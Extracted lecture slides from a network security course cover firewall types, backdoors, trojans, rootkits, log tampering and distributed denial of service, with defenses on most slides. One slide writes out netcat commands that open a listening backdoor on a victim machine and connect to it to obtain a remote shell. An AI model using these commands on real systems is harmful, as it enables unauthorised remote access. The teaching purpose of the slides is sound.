• Intrusions (vulnerability, exploit)• Intrusion phases• Reconnaissance (non-technical, technical)

– Interrogating DNS, split-horizon DNS• Scanning

– Learn about live machines, open ports, firewall rules, network topology, OSes, vulnerabilities

– NATs– Firewalls

• Gaining access– Buffer overflow attacks– Sniffing– ARP poisoning, DNS poisoning– Spoofing TCP sessions

Summary From the Last Lecture

• Midterm in two weeks• Midterm review next week

– We will go over two sample midterms, posted on class Web page

– Bring any questions you may have• Reading list posted on the class Web page

Announcements

• Packet (stateless) firewall– Rules speak about IP/TCP header fields– No connection state kept– E.g. drop all traffic with TCP SYN and src IP from the outside

• Statefull firewall– Connection state is kept– E.g. drop all traffic except TCP ACK on established TCP connections

• Proxy firewall– Act as a middleman to every connection, i.e. act as the destination and

the source for every connection.– Can normalize protocols, reset TTL fields, etc.

Firewall Types

Phase 4: Maintaining Access• Attacker establishes a listening application on a

port (backdoor) so he can log on any time with or without a password

• Attackers frequently close security holes they find to stop others from taking over their compromised machines

Netcat Tool• Similar to Linux cat command

– http://netcat.sourceforge.net/– Client: Initiates connection to any port on remote machine– Server: Listens on any port– To open a shell on a victim machine

On victim machine: nc –l –p 1234

/* This opens a backdoor */

On attacker machine: nc 123.32.34.54 1234 –c /bin/sh

/* This enters through a backdoor, opens a shell */

Dangerous

Netcat Tool• Used for

– Port scanning– Backdoor– Relaying the attack (stepping stones)

Trojans• Application that claims to do one thing (and looks

like it) but it also does something malicious• Users download Trojans from Internet (thinking they

are downloading a free game) or get them as greeting cards in E-mail, or as ActiveX controls when they visit a Web site

• Trojans can scramble your machine– They can also open a backdoor on your system, steal data,

misuse your machine, etc.• They will report successful infection to the attacker

Back Orifice• Trojan application that can

– Log keystrokes– Steal passwords– Create dialog boxes– Mess with files, processes or system (registry)– Redirect packets– Set up backdoors– Take over screen and keyboard– http://www.bo2k.com/

Dangerous

Trojan Defenses• Antivirus software• Don’t download suspicious software• Check MD5 sum on trusted software you

download• Disable automatic execution of attachments

At the End of Maintaining Access• The attacker has opened a backdoor and can now

access victim machine at any time

Phase 5: Covering Tracks• Rootkits• Alter logs• Create hard-to-spot files• Use covert channels

Application Rootkits• Alter or replace system components

(for instance DLLs)• E.g., on Linux attacker replaces ls program• Rootkits frequently come together with sniffers:

– Capture a few characters of all sessions on the Ethernet and write into a file to steal passwords

– Administrator would notice an interface in promiscuous mode• Not if attacker modifies an application that shows interfaces -

netstat

Application Rootkits• Attacker will modify all key system applications that

could reveal his presence– List processes e.g. ps– List files e.g. ls– Show open ports e.g. netstat– Show system utilization e.g. top

• He will also substitute modification date with the one in the past

Defenses Against App. Rootkits• Don’t let attackers gain root access• Use integrity checking of files:

– Carry a CD with md5sum, check hashes of system files against hashes advertised on vendor site or hashes you stored before

• Use Tripwire– Free integrity checker that saves md5 sums of all

important files in a secure database (read only CD), then verifies them periodically

– http://www.tripwire.org/

Kernel Rootkits• Replace system calls

– Intercept calls to open one application with calls to open another, of attacker’s choosing

– Now even checksums don’t help as attacker did not modify any system applications

– You won’t even see attacker’s files in file listing– You won’t see some processes or open ports

• Usually installed as kernel modules• Defenses: disable kernel modules

Altering Logs• Attackers can:

– Stop logging services– Load files into memory, change them– Restart logging service– Or simply change log file through scripts

• Change login and event logs, command history file, last login data

Defenses Against Altering Logs• Use separate log servers

– Machines will send their log messages to these servers

• Encrypt log files• Make log files append only• Save logs on write-once media

Creating Hard-to-Spot Files• Names could look like system file names, but slightly

changed– Start with .– Start with . and add spaces– Make files hidden

• Defenses: intrusion detection systems and caution

Denial of Service

Distributed Denial Of Service?

Distributed Denial Of Service?

Denial of Service Attacks

• Unlike other forms of computer attacks, goal isn’t access or theft of information or services

• The goal is to stop the service from operating– To deny service to legitimate users– Slowing down may be good enough

• This is usually a temporary effect that passes as soon as the attack stops

How Can a Service Be Denied?

• Lots of ways– Crash the machine– Or put it into an infinite loop– Crash routers on the path to the machine– Use up a key machine resource– Use up a key network resource– Deny another service needed for this one (DNS)

• Using up resources is the most common approach

High-level Attack Categorization

• Floods• Congestion control exploits• Unexpected header values• Invalid content• Invalid fragments• Large packets• Impersonation attacks

Simple Denial of Service

25

Simple Denial of Service• One machine tries to bring down another

machine• There is a fundamental problem for the

attacker:– The attack machine must be “more powerful”

than the target machine to overload it OR– Attacker uses approaches other than flooding

• The target machine might be a powerful server

Denial of Service and Asymmetry

• Sometimes generating a request is cheaper than formulating a response e.g. sending a bogus packet is cheaper than decrypting this packet and checking that it’s bogus

• If so, one attack machine can generate a lot of requests, and effectively multiply its power

• Not always possible to achieve this asymmetry• This is called amplification effect

DDoS “Solves” That Problem

• Use multiple machines to generate the workload

• For any server of fixed power, enough attack machines working together can overload it

• Enlist lots of machines and coordinate their attack on a single machine

Distributed Computing

Typical Attack Modus Operandi

Is DDoS a Real Problem?

• Yes, attacks happen every day– One study reported ~4,000 per week1

• On a wide variety of targets• Tend to be highly successful• There are very few mechanisms that can stop

certain attacks• There have been successful attacks on major

commercial sites

1”Inferring Internet Denial of Service Activity,” Moore, Voelker, and Savage, Usenix Security Symposium, 2002

DDoS on Twitter• August 2009, hours-long service outage

– 44 million users affected• At the same time Facebook, LiveJournal,

YouTube and Blogger were under attack– Only some users experienced an outage

• Real target: a Georgian bloggerImage borrowed from Wired.comarticle. Originallyprovided by Arbor

Networks

DDoS on Mastercard and Visa• December 2010• Parts of services went down briefly• Attack launched by a group of vigilantes called

Anonymous– Bots recruited through social engineering– Directed to download DDoS software and take

instructions from a master– Motivation: Payback to services that cut their support

of WikiLeaks after their founder was arrested on unrelated charges

• Several other services affected

Potential Effects of DDoS Attacks

• Most (if not all) sites could be rendered non-operational

• The Internet could be largely flooded with garbage traffic

• Essentially, the Internet could grind to a halt– In the face of a very large attack

• Almost any site could be put out of business– With a moderate sized attack

Who Is Vulnerable?

• Everyone connected to the Internet can be attacked

• Everyone who uses Internet for crucial operations can suffer damages

But My Machines Are Well Secured!

36

Doesn’t matter!The problem isn’t your vulnerability, it’s everyone elses’

But I Have a Firewall!

Doesn’t matter! Either the attacker slips his traffic into

legitimate traffic

Or he attacks the firewall

But I Use a VPN! Doesn’t matter!

The attacker can fill your tunnel with garbageSure, you’ll detect it and discard it . . .

But you’ll be so busy doing so that you’ll have no time for your real work

But I’m Heavily Provisioned

Doesn’t matter!

The attacker can probably get enough resources to overcome any level of resources you buy

Attack Toolkits• Widely available on the net

– Easily downloaded along with source code– Easily deployed and used

• Automated code for: – Scanning – detection of vulnerable machines – Exploit – breaking into the machine – Infection – placing the attack code

• Rootkits– Hide the attack code – Restart the attack code– Keep open backdoors for attacker access

• DDoS attack code

DDoS Attack Code• Attacker can customize:

– Type of attack • UDP flood, ICMP flood, TCP SYN flood, Smurf attack

(broadcast ping flood)• Web server request flood, authentication request flood, DNS

flood– Victim IP address– Duration– Packet size– Source IP spoofing– Dynamics (constant rate or pulsing)– Communication between master and slaves

Implications Of Attack Toolkits

• You don’t need much knowledge or great skills to perpetrate DDoS

• Toolkits allow unsophisticated users to become DDoS perpetrators in little time

• DDoS is, unfortunately, a game anyone can play

DDoS Attack Trends• Attackers follow defense approaches, adjust their

code to bypass defenses• Use of subnet spoofing defeats ingress filtering• Use of encryption and decoy packets, IRC or P2P

obscures master-slave communication• Encryption of attack packets defeats traffic

analysis and signature detection• Pulsing attacks defeat slow defenses and

traceback• Flash-crowd attacks generate legitimate (well-

formed) application traffic

Implications For the Future• If we solve simple attacks, DDoS perpetrators will

move on to more complex attacks• Recently seen trends:

– Larger networks of attack machines– Rolling attacks from large number of machines– Attacks at higher semantic levels– Attacks on different types of network entities– Attacks on DDoS defense mechanisms

• Need flexible defenses that evolve with attacks

How Come We Have DDoS?• Natural consequence of the way Internet is organized

– Best effort service means routers don’t do much processing per packet and store no state – they will let anything through

– End to end paradigm means routers will enforce no security or authentication – they will let anything through

• It works real well when both parties play fair• It creates opportunity for DDoS when one party cheats

There Are Still No Strong Defenses Against DDoS

• You can make yourself harder to attack• But you can’t make it impossible• And, if you haven’t made it hard enough, there’s not

much you can do when you are attacked– There are no patches to apply– There is no switch to turn– There might be no filtering rule to apply– Grin and bear it